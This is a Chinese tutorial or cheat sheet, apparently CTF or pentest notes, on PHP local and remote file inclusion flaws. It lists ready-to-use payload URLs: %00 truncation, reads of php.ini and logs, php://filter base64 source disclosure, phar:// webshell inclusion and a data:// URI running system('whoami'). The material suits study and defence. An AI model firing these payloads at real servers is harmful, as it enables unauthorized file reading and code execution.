web php 文件包含漏洞是“代码注入“的一种。代码注入的原理就是注入一段用户能控制的脚本或代码,并让服务端执行
常见的导致文件包含的函数如下:
PHP: include(), include_once(), require(),require_once, fopen(), readfile() ….
JSP/Servlet: ava.io.File(),java.io.FileReader() …
ASP:include file, include virtual…
PHP文件包含主要由这四个函数完成:
include()
require()
include_once()
require_once()
当使用这4个函数包含一个新的文件时,该文件将作为PHP代码执行,PHP内核并不会在意该被包含文件是什么类型。所以如果被包含的是txt文件、图片文件、远程URL,也都将作为PHP代码执行。
本地文件包含
在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,我们可以在文件名中使用%00进行截断,也就是说文件名中%00后的内容不会被识别,即下面两个url是完全等效的。
A http://ip/a.php?page=…\php.ini
B http://ip/a.php?page=…\php.ini%00xx.php
使用%00截断可以绕过某些过滤规则,例如要求page参数的后缀必须为php,这时链接A会读取失败,而链接B可以绕过规则成功读取
常用语法:
http://xx/ 读取session文件
http://xx/xx.file 包含上传的附件
http://xx/error.log 包含错误日志
http://xx/ httpd.conf 获取web目录或者其他配置文件
http://xx/?page=file.txt%00xx.php %00截断
http://xx/page=file:///c:/flagvalue.txt 使用file:///path 查看文件
phpinfo() 查看临时文件存放目录,包含临时文件
phar://压缩文件名/webshell.php 压缩webshell.php
http://?page=php://filter/read=convert.base64-encode/resource=xx.file
hints about php://filter
php://filter/source=<filename> 读取文件内容
php://filter/read=string.toupper/source=<fileanme>`
将文件内容转换大写输出
php://filter/read=string.tolower/source=<filename>`
将文件内容转换小写输出
php://filter/read=string.strip_tags/source=<filename>
去除文件内容中html标签输出
php://filter/read=convert.base64-decode/resource=<filename>
将文件内容base64解密后输出
php://filter/read=convert.base64-encode/resource=<filename>
将文件内容base64加密后输出
远程文件包含
选项allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件
http://xx/?page=data://text/plain,<?php system("whoami")?>
执行php 代码 system函数
http://xx/?page=data://text/plain;base64,base64Code
利用data URIs
data://image/jpeg;base64,...